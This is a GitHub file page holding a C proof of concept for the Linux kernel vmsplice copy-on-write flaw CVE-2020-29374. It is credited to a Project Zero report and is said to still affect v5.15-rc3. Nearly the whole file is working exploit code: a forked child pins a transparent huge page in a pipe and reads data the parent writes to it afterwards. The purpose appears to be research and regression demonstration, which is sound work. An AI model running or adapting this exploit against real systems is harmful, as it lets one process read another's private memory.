-
Notifications
You must be signed in to change notification settings - Fork 1
/
vmsplice-v5.11.c
62 lines (54 loc) · 1.49 KB
/
vmsplice-v5.11.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
/*
* Slightly modified version of the CVE-2020-29374 exploit:
* https://bugs.chromium.org/p/project-zero/issues/detail?id=2045
*
* From: Jann Horn <[email protected]> fixed in
* 17839856fd588f4ab6b789f482ed3ffd7c403e1f, but reintroduced and still
* affects v5.15-rc3 commit 4de593fb965fc2bd11a0b767e0c65ff43540a6e4
*
* Fixed in https://gitlab.com/aarcange/aa/-/tree/mapcount_unshare
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <err.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <sys/wait.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
static void *data;
static void child_fn(void) {
int pipe_fds[2];
SYSCHK(pipe(pipe_fds));
struct iovec iov = {.iov_base = data, .iov_len = 2*1024*1024 };
SYSCHK(vmsplice(pipe_fds[1], &iov, 1, 0));
SYSCHK(munmap(data, 2*1024*1024));
sleep(2);
char buf[2*1024*1024];
SYSCHK(read(pipe_fds[0], buf, 2*1024*1024));
printf("read string from child: %s\n", buf);
}
int main(void) {
if (posix_memalign(&data, 2*1024*1024, 2*1024*1024))
errx(1, "posix_memalign()");
if (madvise(data, 2*1024*1024, MADV_HUGEPAGE))
errx(1, "madvise()");
strcpy(data, "BORING DATA");
pid_t child = SYSCHK(fork());
if (child == 0) {
child_fn();
return 0;
}
sleep(1);
strcpy(data, "THIS IS SECRET");
int status;
SYSCHK(wait(&status));
}